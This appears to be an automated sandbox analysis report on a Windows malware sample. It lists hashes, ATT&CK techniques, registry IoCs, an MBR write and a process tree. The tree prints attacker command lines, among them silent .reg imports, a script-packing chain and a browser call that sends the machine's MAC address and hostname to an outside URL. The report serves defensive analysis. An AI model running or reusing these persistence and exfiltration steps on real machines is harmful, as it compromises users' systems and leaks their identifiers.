166d04f845fc5460233eb6f7b0510a69ff2d90bd6ae8062453097d4878c3b97b

Analysis

max time kernel
66s
max time network
75s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
25-06-2024 08:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe
Size

895KB
MD5

0d68d0b728c15702de28772dadc20f09
SHA1

52e64a2204b7c694c51c77cf906b460da3464503
SHA256

166d04f845fc5460233eb6f7b0510a69ff2d90bd6ae8062453097d4878c3b97b
SHA512

012461fef1360d50343b4baf3c70391a9fa63b1f5af4f12cb6c865c20d0bdf4748316654dc21aa950ac39649522f5142a1016cb9aac17616ecab77f4c951dc22
SSDEEP

12288:dZjMLf11MmPQeRXEHYYS3gA0FJO1t3r6QJ3LdXWcmfnGA2feMe3JZJ7kASbla:dafIiy4NwdLpQJZXWgcpJZJAVa

Score

10^/10

bootkit evasion persistence upx

Malware Config

Signatures

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	WScript.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	baidu.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 2 IoCs

pid	Process
2124	baidu.exe
2596	SeFastInstall2_3214.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00070000000233be-3.dat	upx
behavioral2/files/0x00070000000233c0-12.dat	upx
behavioral2/memory/2124-16-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral2/memory/2596-20-0x0000000000400000-0x00000000004FC000-memory.dmp	upx
behavioral2/memory/2124-48-0x0000000000400000-0x0000000000429000-memory.dmp	upx
behavioral2/memory/2596-49-0x0000000000400000-0x00000000004FC000-memory.dmp	upx
behavioral2/memory/2596-51-0x0000000000400000-0x00000000004FC000-memory.dmp	upx
behavioral2/memory/2124-55-0x0000000000400000-0x0000000000429000-memory.dmp	upx

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	SeFastInstall2_3214.exe

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File created	C:\Program Files\Common Files\tk.reg	baidu.exe
File opened for modification	\??\c:\program files\winrar\goxbeibgs.hiylx	baidu.exe
File created	\??\c:\program files\winrar\1_goxbeibgs.hiylx	baidu.exe
File opened for modification	\??\c:\program files\winrar\pack.wsf	baidu.exe
File opened for modification	\??\c:\program files\winrar\goxbeibgs.hiylx	Cmd.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\My.ini	baidu.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 33 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 00bcfd4edbc6da01	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page Redirect Cache = "c:\\about blank.htm"	WScript.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002322fad14fdb874f8edc4f7e0cc1913e00000000020000000000106600000001000020000000a281e5a357b7395d49982ca356430ab4979e53ecc90ef03e017e6bebfdba4b9f000000000e8000000002000020000000f96a702f76a2b14f48b831e24150815b770c5eca9223dd18030855c1e82631f620000000f876fb300127319e9281d2edd2a421be20988b676404df467cadc21ccb45de1540000000f7f5ab741360cffa9d39bac2152f959dc41d2b5fb5bf036eb9f3f867d6c3bf83547326ee5f559bdc13abef8609b3eeb30e1dfdb835976d852f2d96e00953f8d7	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "425466651"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Local Page = "c:\\about blank.htm"	WScript.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 903d2f4ddbc6da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Main	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{78EBF1D5-32CE-11EF-BA70-EABD73F69B33} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002322fad14fdb874f8edc4f7e0cc1913e00000000020000000000106600000001000020000000c9c0d424b17adff6d67ffee0a35b532dca5212478a4bf578f993a697ec7f432f000000000e8000000002000020000000a2dca26ce9bfd7e1e7af5d1c9dc4aee313914115d6067eaf57efb590d373c2a920000000e27f4294f41f38c90c983769a7fd6148b8c6135a6dfd45303d4fc53baf7d63bf40000000764e0ba728ccd9431ad6568da0ac1bd037b5ca9b7c2820d7dafe3c8c9a6d3f9e69ab39248af18ff2751898f506f76637d4824c7847a25a9053657ae8f2da71f8	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Search Page = "c:\\about blank.htm"	WScript.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "c:\\about blank.htm"	WScript.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Print	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\PropertySheetHandlers\WSHProps	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\CLSID\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\ContextMenuHandlers\	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Edit\Command\ = "C:\\Windows\\SysWow64\\Notepad.exe %1"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ScriptHostEncode\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\CLSID\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\CLSID	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Print\Command\ = "C:\\Windows\\SysWow64\\Notepad.exe /p %1"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\DropHandler	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.Ink	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\Command	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\CLSID\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command\ = "WScript.exe"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ScriptEngine	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ScriptEngine\ = "JScript"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open\Command	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\command	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\NeverShowExt\	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\ = "????(&H)"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\DefaultIcon	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Explorer"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\FriendlyTypeName = "@%SystemRoot%\\System32\\wshext.dll,-4804"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\DefaultIcon\ = "%SystemRoot%\\SysWow64\\url.dll,0"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\IconHandler\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open\command\ = "WScript.exe \"c:\\program files\\winrar\\goxbeibgs.hiylx\" \"%1\""	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\ContextMenuHandlers	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\ = "Open"	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.qc\ = "qcfile"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\DefaultIcon\ = "%SystemRoot%\\SysWow64\\url.dll,0"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\????(&O)\Command	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "1"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open\command	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\ContextMenuHandlers\	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\CLSID = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\DropHandler\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\IconHandler	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\NeverShowExt	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command\ = "C:\\Windows\\SysWow64\\WScript.exe \"%1\" %*"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\CLSID	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\Shell\	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ = "JScript Script File"	regedit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\PropertySheetHandlers	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\ContextMenuHandlers\	regedit.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open\CLSID = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Open2\ = "Open &with Command Prompt"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\IntroText = "Internet Explorer"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.qc	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\IconHandler\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}"	WScript.exe

Runs .reg file with regedit 1 IoCs

pid	Process
1108	regedit.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
2492	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe
2492	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe
2492	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe
2924	iexplore.exe
2924	iexplore.exe
2924	iexplore.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
2492	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe
2492	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe
2492	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe

Suspicious use of SetWindowsHookEx 16 IoCs

pid	Process
2596	SeFastInstall2_3214.exe
2124	baidu.exe
2924	iexplore.exe
2924	iexplore.exe
512	IEXPLORE.EXE
512	IEXPLORE.EXE
2924	iexplore.exe
2924	iexplore.exe
4352	IEXPLORE.EXE
4352	IEXPLORE.EXE
2924	iexplore.exe
2924	iexplore.exe
2524	IEXPLORE.EXE
2524	IEXPLORE.EXE
2524	IEXPLORE.EXE
2524	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 2492 wrote to memory of 2124	2492	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	81
PID 2492 wrote to memory of 2124	2492	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	81
PID 2492 wrote to memory of 2124	2492	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	81
PID 2492 wrote to memory of 2596	2492	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	82
PID 2492 wrote to memory of 2596	2492	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	82
PID 2492 wrote to memory of 2596	2492	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	82
PID 2492 wrote to memory of 2924	2492	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	83
PID 2492 wrote to memory of 2924	2492	0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe	83
PID 2124 wrote to memory of 1512	2124	baidu.exe	84
PID 2124 wrote to memory of 1512	2124	baidu.exe	84
PID 2124 wrote to memory of 1512	2124	baidu.exe	84
PID 1512 wrote to memory of 1108	1512	cmd.exe	86
PID 1512 wrote to memory of 1108	1512	cmd.exe	86
PID 1512 wrote to memory of 1108	1512	cmd.exe	86
PID 2924 wrote to memory of 512	2924	iexplore.exe	87
PID 2924 wrote to memory of 512	2924	iexplore.exe	87
PID 2924 wrote to memory of 512	2924	iexplore.exe	87
PID 2124 wrote to memory of 3700	2124	baidu.exe	89
PID 2124 wrote to memory of 3700	2124	baidu.exe	89
PID 2124 wrote to memory of 3700	2124	baidu.exe	89
PID 3700 wrote to memory of 3080	3700	Cmd.exe	91
PID 3700 wrote to memory of 3080	3700	Cmd.exe	91
PID 3700 wrote to memory of 3080	3700	Cmd.exe	91
PID 2124 wrote to memory of 2320	2124	baidu.exe	92
PID 2124 wrote to memory of 2320	2124	baidu.exe	92
PID 2124 wrote to memory of 2320	2124	baidu.exe	92
PID 2320 wrote to memory of 4052	2320	WScript.exe	93
PID 2320 wrote to memory of 4052	2320	WScript.exe	93
PID 2924 wrote to memory of 4352	2924	iexplore.exe	94
PID 2924 wrote to memory of 4352	2924	iexplore.exe	94
PID 2924 wrote to memory of 4352	2924	iexplore.exe	94
PID 2124 wrote to memory of 4168	2124	baidu.exe	97
PID 2124 wrote to memory of 4168	2124	baidu.exe	97
PID 2124 wrote to memory of 1704	2124	baidu.exe	98
PID 2124 wrote to memory of 1704	2124	baidu.exe	98
PID 2124 wrote to memory of 1704	2124	baidu.exe	98
PID 2924 wrote to memory of 2524	2924	iexplore.exe	99
PID 2924 wrote to memory of 2524	2924	iexplore.exe	99
PID 2924 wrote to memory of 2524	2924	iexplore.exe	99

C:\Users\Admin\AppData\Local\Temp\0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0d68d0b728c15702de28772dadc20f09_JaffaCakes118.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2492
- C:\baidu.exe
  C:\baidu.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2124
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c regedit /s "C:\Program Files\Common Files\tk.reg"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1512
  - - C:\Windows\SysWOW64\regedit.exe
      regedit /s "C:\Program Files\Common Files\tk.reg"
      4⤵
      Modifies registry class
      Runs .reg file with regedit
      PID:1108
- - C:\Windows\SysWOW64\Cmd.exe
    Cmd.exe /c CScript /nologo "c:\program files\winrar\pack.wsf" "c:\program files\winrar\1_goxbeibgs.hiylx" >> "c:\program files\winrar\goxbeibgs.hiylx"
    3⤵
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:3700
  - - C:\Windows\SysWOW64\cscript.exe
      CScript /nologo "c:\program files\winrar\pack.wsf" "c:\program files\winrar\1_goxbeibgs.hiylx"
      4⤵
      PID:3080
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\SysWow64\WScript.exe" "C:\program files\winrar\goxbeibgs.hiylx"
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    - Checks computer location settings
    - Modifies Internet Explorer settings
    - Modifies Internet Explorer start page
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:2320
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.54600.com/?byme
      4⤵
      Modifies Internet Explorer settings
      PID:4052
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://www1.4728.net/setuptj.asp?a_ip=&a_mac=EA:BD:73:F6:9B:33&a_cpname=GSAGMHCQ&a_user=byme&a_locip=0.0.0.0
    3⤵
    - Modifies Internet Explorer settings
    PID:4168
- - \??\c:\windows\SysWOW64\wscript.exe
    c:\windows\system32\wscript.exe C:\\Killme.vbs
    3⤵
    PID:1704
- C:\SeFastInstall2_3214.exe
  C:\SeFastInstall2_3214.exe
  2⤵
  - Executes dropped EXE
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of SetWindowsHookEx
  PID:2596
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://www.1234.la/an.htm?qqchang
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2924
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2924 CREDAT:17410 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:512
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2924 CREDAT:17416 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:4352
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2924 CREDAT:17424 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:2524

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Killme.vbs

Filesize
218B

MD5
0639fba03ab54443ada1891bd2e2c7b3

SHA1
ab688409e35f4b7aeba68eaf83fa10fbcb590cd2

SHA256
6620568a36d6a0d43cd64933c87dc362cb950bc0f0e71b7e8b3244ec243c2aad

SHA512
697b7b2301bc00b31ef8ebc0f9917a0d80a9caffb1a3f5c87726c8c0297b991e2c4711e11d8bbab59586958d8f577b035cd97e7406f804b959eeea28db360acc

Download Submit
C:\Program Files\Common Files\tk.reg

Filesize
2KB

MD5
9cca9b5f822c2da86b84e5ef0f1e4681

SHA1
11eb475bb6c333013e554f2a5e050c2ca944fd8c

SHA256
6fb2b8c0a3be058c5bd72079c032081edfb624668649a256884ad158451ecb3d

SHA512
8d29d39392c2e6cf3202cb9f300aedb7e4af44c5d4753d265af1e74f3bd679c184a9e6109611cdb485ad6b24fe2ed50331b9beb18ae4ac6a28e89902e19caeec

Download Submit
C:\SeFastInstall2_3214.exe

Filesize
260KB

MD5
0dd90d39ffe81cdb5f76ce43972279aa

SHA1
d267f9a3952111406d93ec923ea9e1042a5105f1

SHA256
ede8e12b03f88ce44ae189c905a2885f76129d9141e17878a3ab2fbc4464e4a9

SHA512
